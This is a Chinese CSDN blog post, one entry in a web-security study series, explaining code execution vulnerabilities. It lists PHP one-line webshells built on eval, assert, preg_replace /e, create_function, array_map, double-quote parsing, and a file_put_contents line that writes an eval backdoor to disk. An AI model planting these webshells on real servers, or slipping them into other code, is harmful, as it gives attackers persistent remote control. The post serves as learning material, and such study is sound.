WEB安全的总结学习与心得(十六)——代码执行漏洞

最新推荐文章于 2023-03-04 13:27:31 发布
最新推荐文章于 2023-03-04 13:27:31 发布
阅读量2.5k 收藏
点赞数
分类专栏: WEB安全学习总结 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681434/article/details/122641675
版权

WEB安全的总结与心得(十六)

01 什么是代码执行漏洞

代码执行漏洞的定义比较模糊,代码执行、文件包含、反序列化、命令执行,写文件getshell都属于RCE可以统称为RCE漏洞,即远程命令执行或远程代码执行,用户输入的数据被当作后端代码执行。

02 常见一句话木马php代码

0x01 eval函数

eval函数可以执行多行

<php? eval($_request[666]);?>
0x02 assert函数

assert函数只能执行一行,不过可以通过修改传参使参数可以执行多行代码

<php? assert($_request[666]);?>
0x03 正则替换函数
echo preg_replace('/A/ie',$_REQUEST[8],'aaqqqwe');
0x04 匿名函数
$a = create_function('$id',$_REQUEST[8]);
0x05 回调函数
array_map($_REQUEST[1],$_REQUEST);

在这里插入图片描述

0x06 双引号二次解析
"${phpinfo()}"

单引号是纯字符串,双引号内的数据会被解析
在这里插入图片描述

0x07 写文件函数
"${file_put_contents('66.php','<?php eval($_REQUEST[8])?>')}";
小结

注意一下,上述一句话木马运行过程中如果报错了,可能是php版本的问题,适当降低版本即可验证

03 代码审计实现代码执行漏洞(后续更新)

ultracool
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
学习代码心得总结
doney88的博客
07-05 6879
在遇到一个自己搞不懂的问题点后,总结了以下方法论: 在csdn中查询关键字,找标题关联性最大的点开找大概10个帖子看。(查资料,先找,找一定量后,一个个再看) 看msdn 问大神 当然在找资料的时候会发现,找到相关的资料里面也有看不懂的,那就继续对看不懂的资料继续深入,就像是一个个节点。个人觉得当你达到第三层的时候差不多就该收手了,这个世界那么大你不可能搞懂世间万物所有事情。 同时脑子里一定要...
PHP代码审计学习总结
cnbird's blog
03-06 1823
0×01 引言 PHP是一种被广泛使用的脚本语言,尤其适合于web开发。具有跨平台,容易学习,功能强大等特点,据统计全世界有超过34%的网站有php的应用,包 括Yahoo、sina、163、sohu等大型门户网站。而且很多具名的web应用系统(包括bbs,blog,wiki,cms等等)都是使用php 开发的,Discuz、phpwind、phpbb、vbb、wordpress、boblog等
计算机软件漏洞引发的问题论文,【计算机安全论文】计算机漏洞检测分析(共3404字)...
weixin_39779975的博客
07-05 460
1漏洞的定义与特点可以将漏洞定义为存在于一个系统内的弱点或缺陷,这些弱点或缺陷导致系统对某一特定的威胁攻击或危险事件具有敏感性,或具有进行攻击威胁的可能性[1]。软件漏洞产生通常是由于在软件的设计和实现中由于开发人员有意或无意的失误造成是系统潜在的不安全性。漏洞可以划分为功能性逻辑漏洞安全性逻辑漏洞。功能性逻辑漏洞是指影响软件的正常功能,例如执行结果错误、执行流程错误等。安全性逻辑漏洞是指通常情...
关于计算机安全漏洞问题,写一篇1000字的文章
weixin_35755562的博客
01-04 124
计算机安全漏洞是指计算机系统中的软件或硬件的某些缺陷或错误,可能会被黑客利用来攻击系统,造成信息泄露、数据丢失、服务中断等后果。计算机安全漏洞是当前信息时代面临的一大挑战,也是政府、企业和个人需要高度重视的问题。 一、计算机安全漏洞的类型 计算机安全漏洞可分为软件漏洞和硬件漏洞两种。 1、软件漏洞 软件漏洞指的是软件程序中的漏洞,可能是由于软件设计不足、代码实现错误或者功能使用不当造成的。软件漏洞...
[ 代码审计篇 ] Java 代码审计常用漏洞总结
qq_51577576的博客
12-30 901
主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯:跟踪用户的输入数据, 判断数据进入的每一个代码逻辑是否有可利用的点, 此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。敏感函数参数回溯, 根据敏感函数, 逆向追踪参数传递的过程。这个方法是最高效, 最常用 的方法。大多数漏洞的产生是因为函数的使用不当导致的, 只要找到这些函数, 就能够快速 挖掘想要的漏洞。以下是基于关键词审计技巧总结:在搜索时要注意是否为整个单词, 以及小写敏感这些设置。
程序员的角度看web安全——兼谈php代码审计.pdf
08-07
但所谓“解铃还需系铃人”,coding的问题终究还需要coder来解决,无论对于安全服务工程师还是对于普通开发工程师,在面对Web安全问题时终究要把其脉、摸其底,以往的渗透测试工程师讲Web安全或侧重漏洞原理,或侧重...
菜鸟浅谈——web安全测试
01-27
2)在挖漏洞挣外快时,注意不要使用安全扫描或暴力破解软件对上线网站进行扫描或攻击。不要对上线网站造成破坏,不要去获取网站的数据库信息等。否则等待的不是money,而是牢狱啦~~ 1)worldwideweb万维网,也被叫做...
Web中间件常见漏洞总结.pdf
06-14
Web中间件常见漏洞总结
WEB应用防火墙」WordPress 5.0.0远程代码执行漏洞研究 - AI安全.zip
12-06
WEB应用防火墙」WordPress 5 安全测试 安全漏洞 渗透测试 web安全 安全防护
web突破上传漏洞总结
02-11
文档比较详细地描述了突破上传漏洞的方式,适合初学者学习
安全编码笔记
kernweak的博客
06-14 986
gs security cookie,防止栈溢出,在栈上堆上放了security cookie,函数退出是会判断是否溢出,yognIDA时候可以看见。 还有就是变量重新排列。 突破方式:未被保护的内存绕过(未大于4字节的缓存默认不开gs),覆盖虚函数突破,SEH攻击突破,替换cookie突破。 safeseh 操作系统编译器双从支持,编译器启用该链接选项后,编译器在编译程序的时候将把所有...
WEB安全学习总结心得(一)
weixin_44681434的博客
01-20 3528
** WEB安全学习总结心得(一) ** 这个假期,我开启了web安全学习之旅,根据课程的安排,首先学习了一些web相关的基础知识。 web英文全称为world wide web,中文名称为万维网,我们常称之为www,简单地说,我们平时通过浏览器上网其实就是webweb主要经历了web1.0和web2.0两个时代,web1.0即万维网的初期,比较典型地比如门户网站和个人网站,提供静态页面供...
iwebsec--代码执行漏洞
追求卓越,技术流~
12-04 1082
代码审计 如果post请求中有1,就会执行1中的参数 assert()函数和evel()函数类似,能把里面的字符串转化为php代码执行 call_user_func()函数第一个参数是函数,第二个参数是调用的参数 fun=“系统执行的函数”,而arg=“系统执行的命令” 可以说,如果黑客知道有这个函数那么后果是非常严重的,可以写入任意的语句 和call_user_func一样没太大区别 create_function()函数,func构造的函数,而func构造的函数,而func构造的函数,而code
代码执行漏洞 | iwebsec
weixin_52116519的博客
03-04 2226
call_user_func()、call_user_func_array()函数的功能是调用函数,多用在框架中动态调用函数,所以一般比较小的程序较少出现这种方式的代码执行。array_map()函数的作用是调用函数,并且除第一个参数外其他参数为数组,通常会写死第一个参数,即写死调用函数。
web安全学习总结
qq_36386435的博客
02-12 781
本博客内容是看看雪论坛上的教程总结而来: Web安全 前提:环境安装 DVWA下载地址:https://github.com/ethicalhack3r/DVWA Phpstudy下载地址:http://phpstudy.php.cn 操作方法: 安装好win7的虚拟机,其他操作系统都可以,我安的是windows7, 下载phpstudy和DVWA上传到虚拟机中; 第一步:运行phpstud...
WEB安全小结
vcbal的博客
03-25 489
前言 ​ 前一段时间接触了一下web安全的实训。。。(笑)。痛定思过,这里总结一下自己对于WEB安全的认识 ​ 目录 前言 目录 目前常见的安全性问题 1、SQL注入 1、原理 2、具体实现过程 2、xss攻击 3、csrf令牌攻击 4、DDos攻击 4、种类 5、CC攻击 6、钓鱼软件以及弱口令管理员密码(。。。) 7、外链盗用 8、删库跑路(极端情况、容灾能...
Web安全实践实验
restart-llyang的博客
06-22 1705
Web安全实践实验 一、网站加密过程简介 CA(Certificate Authority) 加密 网站 步骤: 1.CA给浏览器厂商发公钥 2.阿里把公钥给CA,CA用自己的私钥加密阿里的公钥,返回给阿里 3.用户用浏览器访问阿里的网站,阿里把用CA的私钥加密过的自己的公钥给用户 4.用户用浏览器中的CA公钥解密阿里公钥,正确配对则信任访问的网站...
Web安全实验1-网络扫描实验
lyy_g的博客
12-26 6937
警示:实验报告如有雷同,雷同各方当次实验成绩均以0分计;在规定时间内未上交实验报告的,不得以其他方式补交,当次成绩按0分计;实验报告文件以PDF格式提交。   院系 数据科学与计算机学院 班级 15级4班 学号 15331145 姓名 李果 完成日期:  2017年  12  月   3
WEB安全学习总结心得(三)
weixin_44681434的博客
03-23 1179
WEB安全学习总结心得(三) 写给读者的话 大家好,让我们继续一起来学习web安全。大家也许会有些困惑,都已经总结了两次还没有学到关于安全的东西呢?这个请大家不要着急,学习web基础知识就像是建房子打地基一样,这些东西不一定要像开发人员学的那么透彻,但是作为安全人员需要学习一些必备的知识。 前端语言之HTML ...
php漏洞eval,Web安全代码执行漏洞
最新发布
05-16
但是,这也使得它成为...为了避免代码执行漏洞,应当避免使用 eval 函数,或者对用户输入进行充分的过滤和验证,确保只有安全的输入才会被传递到 eval 函数中。同时,应当及时更新 PHP 版本,以防止已知的漏洞被利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ultracool

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值